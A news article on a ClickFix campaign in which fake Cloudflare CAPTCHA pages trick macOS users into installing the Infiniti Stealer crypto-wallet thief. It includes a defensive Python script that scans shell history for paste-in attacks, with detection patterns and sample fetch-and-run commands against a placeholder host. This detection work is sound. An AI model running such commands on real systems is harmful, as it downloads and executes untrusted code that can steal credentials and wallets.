Fake CAPTCHA steals cryptocurrencies from macOS users


Cryptocurrency users are facing a new threat delivered through fake Cloudflare CAPTCHA pages. The attack installs a new information stealer, Infiniti Stealer, built to exfiltrate cryptocurrency wallet data from macOS systems.

Any developer or crypto user working on a MacBook or Mac desktop is a potential target of this malware.

How the ClickFix attack infects the macOS system

The campaign was discovered by security researchers at Malwarebytes. The malware’s launcher was analyzed later, which is where the name Infiniti Stealer was found.

The stealer is delivered through a ClickFix attack, a social engineering technique that tricks users into running a malicious command themselves. Rather than breaking into the computer directly, it convinces the user to do the attacker’s work for them.

The attack starts with a fake CAPTCHA page hosted at update-check(.)com. The page mimics Cloudflare’s human verification check, but it is not Cloudflare’s. After clicking the fake CAPTCHA, the user is instructed to open Terminal and paste a command.

That command is not a verification step. It is a hidden installer that downloads and runs malware on the user’s computer.

Figure: the fake Cloudflare CAPTCHA page that tricks users into running a malicious command and installing the stealer. Source: Malwarebytes.

The attack works because the user runs the command voluntarily. It slips past defenses that look for exploitation because no software vulnerability is exploited; the only thing the attacker needs is a user who follows the instructions.

Once the command runs, it reaches out to a server controlled by the attacker, which quietly delivers and installs Infiniti Stealer on the Mac. No pop-ups, no warnings, just a silent installation.
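As an added example (not code from the Malwarebytes write-up and not part of the campaign), here is a small Python triage script that scans a macOS shell history for the kind of one-liner a ClickFix page asks the victim to paste: a downloader piped straight into a shell, base64 decoding on the command line, quarantine stripping, detached execution. It also decodes base64 tokens it finds and re-scans the hidden layer, because the visible command is often just `echo "<blob>" | base64 -D | sh`. The patterns, the sample history, the domain example.invalid and the encoded payload are all assumptions constructed for this example, not published indicators for Infiniti Stealer.

```python
import base64
import re
from typing import Iterator, List, NamedTuple, Optional, Tuple

# Generic "paste this into Terminal" heuristics. These are assumptions chosen
# for this example, not indicators published for the Infiniti Stealer campaign.
PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"), "remote script piped into a shell"),
    (re.compile(r"\bbase64\s+(-[dD]|--decode)\b"), "base64 decoding on the command line"),
    (re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"), "stdin piped into a shell"),
    (re.compile(r"\bosascript\s+-e\b"), "inline AppleScript execution"),
    (re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b"), "Gatekeeper quarantine attribute stripped"),
    (re.compile(r"\bnohup\b|\bdisown\b"), "detached background execution"),
    (re.compile(r"\b(curl|wget)\b.*\bchmod\s+\+x\b"), "download followed by chmod +x"),
]

# zsh extended history format: ": <epoch>:<duration>;<command>"
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")
# Long runs of base64 alphabet characters that may hide a second-stage command.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


class Finding(NamedTuple):
    timestamp: Optional[int]   # None for plain bash-style history lines
    command: str
    reasons: List[str]


def parse_history(text: str) -> Iterator[Tuple[Optional[int], str]]:
    """Yield (timestamp, command) from zsh extended or plain bash history text."""
    for raw in text.splitlines():
        line = raw.rstrip("\n")
        if not line.strip():
            continue
        m = ZSH_EXT.match(line)
        if m:
            yield int(m.group(1)), m.group(2)
        else:
            yield None, line


def decoded_layers(command: str) -> List[str]:
    """Return printable ASCII strings hidden inside base64 tokens in the command."""
    layers = []
    for tok in B64_TOKEN.findall(command):
        try:
            data = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
            layers.append(data.decode("ascii"))
    return layers


def scan_command(command: str) -> List[str]:
    """Return the list of reasons a single command looks like a ClickFix paste."""
    reasons = [why for rx, why in PATTERNS if rx.search(command)]
    for layer in decoded_layers(command):
        for rx, why in PATTERNS:
            if rx.search(layer):
                reasons.append(f"inside base64 payload: {why}")
    return reasons


def scan_history(text: str) -> List[Finding]:
    """Scan a whole history file and return only the commands that matched."""
    findings = []
    for ts, cmd in parse_history(text):
        reasons = scan_command(cmd)
        if reasons:
            findings.append(Finding(ts, cmd, reasons))
    return findings


# Constructed sample ~/.zsh_history for this example. The domain example.invalid
# and the encoded command are placeholders, not real campaign infrastructure.
_ENCODED = base64.b64encode(b"curl -s http://example.invalid/x | sh").decode()
SAMPLE_HISTORY = f"""\
: 1718000000:0;git status
: 1718000050:0;brew upgrade
: 1718000300:0;echo "{_ENCODED}" | base64 -D | sh
: 1718000400:0;curl -fsSL https://example.invalid/verify.sh | bash
: 1718000500:0;ls -la
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"[{f.timestamp}] {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

To run it against a real machine, read `~/.zsh_history` (zsh is the default shell on current macOS and writes the extended format above when `EXTENDED_HISTORY` is set) and `~/.bash_history` into `scan_history`. A hit is a lead, not a verdict: developers legitimately pipe installers into shells, so confirm with the download URL and what the decoded layer actually does.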

Researchers say the malware is harder to analyze and detect because it is compiled as a native macOS binary rather than shipped as a Python script that can be read as-is.

The malware is designed to steal sensitive data from Macs: cryptocurrency wallet data, credentials from browsers and the macOS keychain, plaintext secrets in developer files, and even screenshots taken while it runs.

It also checks whether it is running in an analysis environment, to evade detection, before sending the stolen data to the attacker’s server. A Telegram notification alerts the attacker when exfiltration completes, and the captured credentials are queued for server-side password cracking.

ClickFix attacks are common on Windows, but attackers are now adapting them to Apple devices, and macOS users can no longer assume they are safe from malware. Crypto users should be careful when browsing and should never paste commands into Terminal from an untrusted source.

Compromises of personal cryptocurrency wallets are rising sharply

This is not the first sophisticated attack on macOS cryptocurrency users. Cryptopolitan reported in March on GhostClaw, a new macOS malware that steals private keys, wallet access, and other sensitive data.

That malware was published on npm, the popular package manager for JavaScript. It posed as a genuine OpenClaw tool but instead launched a multi-stage attack. A total of 178 developers downloaded the malicious package before it was removed from the registry.

A total of $3.4 billion was stolen from the cryptocurrency industry in 2025.

“Personal wallet breaches have grown significantly, increasing from just 7.3% of the total value stolen in 2022 to 44% in 2024,” according to a report from blockchain security company Chainalysis.

Personal wallet compromises could have reached 37% of the value stolen in 2025 had it not been for the outsized impact of the Bybit hack on the total.


